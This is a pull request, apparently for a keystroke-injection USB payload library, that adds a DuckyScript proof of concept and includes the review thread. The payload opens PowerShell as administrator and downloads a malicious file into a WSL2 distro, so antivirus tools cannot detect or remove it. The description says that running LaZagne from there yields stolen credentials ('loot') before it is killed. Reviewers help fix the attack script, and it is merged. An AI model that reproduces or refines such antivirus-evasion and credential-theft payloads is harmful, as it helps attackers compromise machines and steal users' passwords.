### PR TITLE
HideinWSL2

### PR DESCRIPTION
**Pull request by mylorik**
This is a POC of downloading a malicious file to a WSL2 distro without antivirus tampering. This will avoid detections by Windows Defender and 3rd party antivirus solutions. When you try to execute the malicious file from WSL2 distro antivirus may detect it during runtime and kill the process, but it won't be able to remove the file from the WSL2 distro. In case of LaZagne you will be able to get the loot before detection/prevention

### CODE REVIEW

File: payloads/library/execution/HideInWSL/payload.txt [hunk 1]
```diff
@@ -0,0 +1,49 @@
...
+REM Details:
+REM While the antivirus cannot detect the downloaded file, it may be detected during Execution of that bad file, but even then it cannot remove the file from WSL2 distro!
+REM In my testing, LaZagne.exe can be downloaded and executed, you will get the loot, the antivirus will detect the execution and kill the process at some point, but you will get all loot and the file will remain in the WSL2 distro                       
+
+
+REM change to your target language
+DUCKY_LANG us
+
+REM adjust DELAY to your system
+
```
Comment (kalanihelekunihi) [inline payloads/library/execution/HideInWSL/payload.txt:17]: Suggest adding an initial enumeration delay here. Default to 2000 milliseconds
DELAY 2000

While often targets need far lower enumeration delays, there are a few issues with low quality USB Controllers that we've tested that can take up to 1.6 seconds between initial power on to enumeration where key presses would be processed by the Host.

File: payloads/library/execution/HideInWSL/payload.txt [hunk 2]
```diff
@@ -0,0 +1,49 @@
...
+GUI r
+DELAY 100
+
+REM Open the Powershell as Administrator
+STRING powershell
+CTRL-SHIFT ENTER
```
Comment (kalanihelekunihi) [inline payloads/library/execution/HideInWSL/payload.txt:23]: This is a syntax error due to the mixed delimiting characters: Dash and Space
Please change to: CTRL SHIFT ENTER

**Review by kalanihelekunihi — COMMENTED** [review]
I made a couple suggested changes to your script.
One is a best practice change that you can implement or skip at your own discretion.
However, the second will throw a compiler warning due to the mixed delimiter usage. This one should be fixed.

**Comment by mylorik** [comment]
Thank you, updated.

**Pull request merged**